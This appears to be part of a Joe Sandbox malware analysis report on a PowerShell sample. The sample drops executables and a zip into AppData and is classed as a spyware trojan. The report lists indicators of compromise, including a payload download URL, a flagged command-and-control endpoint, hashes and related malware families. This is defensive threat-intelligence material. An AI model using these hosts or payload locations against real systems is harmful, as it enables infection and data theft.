https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://appr0dress.cyou/	bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000002.2415661139.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414247624.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://appr0dress.cyou:443/api	bubs.exe, 00000003.00000003.2414247624.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.2436521329.000001E4198F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.co/	powershell.exe, 00000001.00000002.2436521329.000001E41B952000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.61.154.28	jerseysurffilmfestival.com	United Kingdom	22612	NAMECHEAP-NETUS	false
188.114.96.3	appr0dress.cyou	European Union	13335	CLOUDFLARENETUS	true
172.67.167.249	iplogger.co	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559357
Start date and time:	2024-11-20 12:37:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sus.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@4/9@3/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 83% Number of executed functions: 24 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target bubs.exe, PID 4140 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2664 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: sus.ps1

Simulations

Behavior and APIs

Time	Type	Description
06:38:54	API Interceptor	41x Sleep call for process: powershell.exe modified
06:39:05	API Interceptor	7x Sleep call for process: bubs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.61.154.28	https://jerseysurffilmfestival.com/wakena.zip	Get hash	malicious	Unknown	Browse
188.114.96.3	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/7pdXjNKP/download
172.67.167.249	ofsetvideofre.click.ps1	Get hash	malicious	LummaC	Browse
	4h1Zc12ZBe.exe	Get hash	malicious	Stealc	Browse
	dlcdkJcbbV.exe	Get hash	malicious	LummaC, RedLine	Browse
	1Vkf7silOj.exe	Get hash	malicious	LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse
	https://prezi.com/i/view/0dF0780HKO9RqC8umFaJ	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
iplogger.co	cW5i0RdQ4L.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	cW5i0RdQ4L.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	Activator by URKE v2.5.exe	Get hash	malicious	LummaC	Browse	172.67.188.178
	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	file.exe	Get hash	malicious	DarkTortilla, PureLog Stealer	Browse	104.21.76.57
	file.exe	Get hash	malicious	DarkTortilla	Browse	104.21.76.57
	cmd.exe	Get hash	malicious	Unknown	Browse	104.21.82.93
	cmd.exe	Get hash	malicious	BEAST	Browse	104.21.82.93
	ofsetvideofre.click.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
jerseysurffilmfestival.com	https://jerseysurffilmfestival.com/wakena.zip	Get hash	malicious	Unknown	Browse	185.61.154.28

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://webemail.instittute.click/management.html?bold=acc@lmm.gr	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://hffa.studycentrecpfc.com/D9ns6.studycentrecpfc.com/bUhZb/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	WSock.dll	Get hash	malicious	Ramnit	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	KEFttAEb.vbs	Get hash	malicious	HTMLPhisher	Browse	172.67.211.183
	KEFttAEb.vbs	Get hash	malicious	PureCrypter	Browse	172.67.211.183
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	104.21.36.30
	https://files-pdf-73j.pages.dev/?e=info@camida.com	Get hash	malicious	Unknown	Browse	188.114.96.3
CLOUDFLARENETUS	https://webemail.instittute.click/management.html?bold=acc@lmm.gr	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://hffa.studycentrecpfc.com/D9ns6.studycentrecpfc.com/bUhZb/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	WSock.dll	Get hash	malicious	Ramnit	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	KEFttAEb.vbs	Get hash	malicious	HTMLPhisher	Browse	172.67.211.183
	KEFttAEb.vbs	Get hash	malicious	PureCrypter	Browse	172.67.211.183
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	104.21.36.30
	https://files-pdf-73j.pages.dev/?e=info@camida.com	Get hash	malicious	Unknown	Browse	188.114.96.3
NAMECHEAP-NETUS	MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	QnwvXkF691.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	7NiXU5TCee.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	r7F41la3x6.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	htslUYNLWN.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	QnwvXkF691.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	7NiXU5TCee.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	r7F41la3x6.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	htslUYNLWN.exe	Get hash	malicious	Unknown	Browse	198.54.126.126
	https://tipicopisco.com/go/bebek.txt	Get hash	malicious	Unknown	Browse	185.61.154.26

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	KEFttAEb.vbs	Get hash	malicious	HTMLPhisher	Browse	185.61.154.28 172.67.167.249
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	185.61.154.28 172.67.167.249
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.61.154.28 172.67.167.249
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	185.61.154.28 172.67.167.249
	________.exe	Get hash	malicious	Quasar	Browse	185.61.154.28 172.67.167.249
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.61.154.28 172.67.167.249
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	185.61.154.28 172.67.167.249
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	185.61.154.28 172.67.167.249
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	185.61.154.28 172.67.167.249
	order and drawings_pdf.exe	Get hash	malicious	AgentTesla	Browse	185.61.154.28 172.67.167.249
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	AaronGiles(1).exe	Get hash	malicious	PureCrypter	Browse	188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	Salary 2025- workers-v1.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.413059910741682
Encrypted:	false
SSDEEP:	48:xNn4SU4y4RQmFoUeCamfm9qr9trBLNGOvX0lC1+:PJHyIFKL2O9qrPBRGOMM1+
MD5:	930D56AABBF3EC1D8DF0A0CF6AD55C3F
SHA1:	E2F0D96332A336C8532D2094AB598AE8D38D1B84
SHA-256:	DF99BFD1D4B32B4CE09C0423A6F1282F4365A9EB2AC8C44CC842F898EF70AD42
SHA-512:	6ED3FD1065C121F09A74A55CB9C497293EEE072C66FA7B7F153A8D1D412CC3223077A81273B5D81F7F3F462CD08922FAC1D5FF6E41AD80B7B2D5E5F07B3E6C6E
Malicious:	false
Reputation:	low
Preview:	@...e...........7.....................X..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Ma

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wlnyof2.wcz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0u2mzdt.bxv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Extra\bubs.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4772864
Entropy (8bit):	5.817190240752862
Encrypted:	false
SSDEEP:	98304:h5B1xT9qwpYjMgEbxdhawrPYvbNgEYSolU/I7t4uhcMlcQVtkwgrPPSBBqohgWzM:h5B1xTjpIMgEbxdhawrPYvbNgERolU/h
MD5:	442D526A26805C47376D7B4F78374A4F
SHA1:	3AF8EDC2316C6D602D027C1F0FFA1EB9D68B7047
SHA-256:	6EB422418AEE67819A21DB376F41FFAA9B351392EF7A22E939D997C5C33F8C3C
SHA-512:	1F15301D3C0969A513200B4FBAC8FE70BEE8BDDA8E9C9B56FAB647CBF59EEF0D69FDB46FD2662DE0FBEA1D00338B988803D2D94D793DA3E12B5B16CBB47E8054
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g...............'..H...................H...@.......................... I.....).H...@... ...............................H.,.............................I.......................................................H..............................text.....H.......H................. ..`.data.........H.......H.............@....eh_fram@.....H.......H.............@..@.idata..,.....H.......H.............@....reloc........I.......H.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Extra\cr.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5725184
Entropy (8bit):	5.787352082804843
Encrypted:	false
SSDEEP:	98304:HtV/ZLA4LT49KsfEyp9Qbl3TLnMVeKES8IczjJYnwvjSdthV2wb:HtVRLA4LT49KsfEyp9QbljLnMVeKEjI7
MD5:	6C5456370EA9EA64C7FB6296284FD95A
SHA1:	18341D3079E637B76406B475D8939A7C57F9809A
SHA-256:	7FFD784ADF875B3BAE9A43092CBBE58A1FD80C8F095B869F1087FC5AC8A56628
SHA-512:	D712B176F3C50B28AFEB46F487E461852F7AE82A5B3987B550B18210CDCCEAFF00D45E07C12B359BCAA01A90102D37EF530457A3C8D38E981C2A0155BB885482
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;g...........#...'..H..XW...............H....d..........................W.......W...@... .......................W.w.....W...............................W.(...........................HPW.....................p.W.0............................text.....H.......H.................`..`.data...`R....H..T....H.............@....rdata.......PW......0W.............@..@.eh_fram,....`W......6W.............@..@.bss.........pW..........................edata..w.....W......>W.............@..@.idata........W......@W.............@....CRT....,.....W......TW.............@....tls..........W......VW.............@....reloc..(.....W......XW.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7187359028512654
Encrypted:	false
SSDEEP:	48:ulcDxlztiBmFM33CyktU2U1qKukvhkvklCywpu4/YbllHJWSogZoNO4/YblluWSO:vUt3CQTKkvhkvCCtk5blrH75blGHu
MD5:	8E91FBCFC974D23769E36622507789EB
SHA1:	3C213BD4F6A986397111A8C241C289146EFC46DE
SHA-256:	3303001C9F77201BA5DA6B950D7647EB34FA3AC47E284E7219764387B4590E80
SHA-512:	9E3E87A90DD90BA27EC866B2541767B35D0166B995B40ACDC9158C04E71C6C1BEF9EA562C68F60A7C33381EF97880E082BC31030595029BF8385C2EE818476EB
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S.....6.@;..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....]B.@;..f.h.@;......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2tY.\...........................^.A.p.p.D.a.t.a...B.V.1.....tY.\..Roaming.@......EW<2tY.\..../.....................L...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2tY.\....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2tY.\....2......................%.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2tY.\....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2tY.\....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2tY.\....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MC7XJRVYNUSGNJTCH5GK.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7187359028512654
Encrypted:	false
SSDEEP:	48:ulcDxlztiBmFM33CyktU2U1qKukvhkvklCywpu4/YbllHJWSogZoNO4/YblluWSO:vUt3CQTKkvhkvCCtk5blrH75blGHu
MD5:	8E91FBCFC974D23769E36622507789EB
SHA1:	3C213BD4F6A986397111A8C241C289146EFC46DE
SHA-256:	3303001C9F77201BA5DA6B950D7647EB34FA3AC47E284E7219764387B4590E80
SHA-512:	9E3E87A90DD90BA27EC866B2541767B35D0166B995B40ACDC9158C04E71C6C1BEF9EA562C68F60A7C33381EF97880E082BC31030595029BF8385C2EE818476EB
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S.....6.@;..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....]B.@;..f.h.@;......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2tY.\...........................^.A.p.p.D.a.t.a...B.V.1.....tY.\..Roaming.@......EW<2tY.\..../.....................L...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2tY.\....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2tY.\....2......................%.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2tY.\....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2tY.\....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2tY.\....u...........

C:\Users\user\AppData\Roaming\pkz.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3437295
Entropy (8bit):	7.981556181890705
Encrypted:	false
SSDEEP:	98304:3XS/iF94f2acXLgqNbjnksp1zB0lwkJbY:3XSiF98LGkMb4sp19Wa
MD5:	2C1680E59A482BBE60E7658659B20B3D
SHA1:	3011F9B114213119C2FCE31A3CC6612F889D5668
SHA-256:	23506C79B6112F7A234C35B838FAA9B51286DF3BBA27F27B7731AA0F23364139
SHA-512:	17E971BAC0FFDDB03A99A7FFE47A14B2B712EBF920ABC703840431CED458D955240F5014CD93BF46C43B58B2AD219C6EB78F761532561E3360B89F890866265A
Malicious:	false
Preview:	PK........ecrYSU]v.I...\W.....cr.dll.\|apdYy..^..iV..Kd..6#.mF.Q[J.d...uU.,b..02.F..ETi.e..........v.N..h..J..AN)...W#V..I....9.........@@w+.;......w.v..{..s......o.....E.....s.Z..O....I......<b.]....}......G?.:...>....~....X..C.Z...\.G.k....Z....'....I...e..^oU...G.........-k.e]....FH..".Y+.h_.}2~.\|.'o}..u..[.<.~..(...'.im......nZ......V.k\...M...0....8....(W........OS...p......Z..\|.;n....z.8v.l..}.........0....q.....C..8.W...M..$i.[</.L.ZY...x..~.ob.0...~.'...Ajw.U.7..........^....?.a...a..\.wY...I..l.......'q+..rof.........J.....6.x...A.1.m.......y.....^....8..e+'....\|7u....3{r..G.....{............]....r.O.....B..o...7...Rg...1z.$..9C..... s..5.W.H.)............_..8..M..W'..Eqf.?..}.t;.....o....p..m.q.....R...C.........s..39Ef. s.!B..E4......~.....x...1.z........~.x..../....,q....(.....I..4..w~.......Oe.#!.X.]".o..5,.`a....q+;........m...uQ%......3...]lJ....!.-.8.U...E...\.b............k..qP.R ..._.......h........&.+.

Static File Info

General

File type:	ASCII text
Entropy (8bit):	5.422340790510243
TrID:
File name:	sus.ps1
File size:	493 bytes
MD5:	1cf7079cb5381c91a928ce8eb2757e6e
SHA1:	1f75a9c304c39b5c762ffad595f648e38f260fa5
SHA256:	8514c966bedb00efc1d8d99bd0dca4a0183807988964d896b741780a4cbd4543
SHA512:	0417b2d494e410a48f19dea5e1cf0e64b843282d5debbe1cfa43ea78bbecbbd290a713d1a35a0a23708d0aa6ad6ba2d68704834286129ece38403605d77b026b
SSDEEP:	12:b/LaeK9d9A2xq8qG3MaG3PCdYahqAnAaGltKMMn0k8Q:b/LaJWSq838n3PCdYahNGD+V8Q
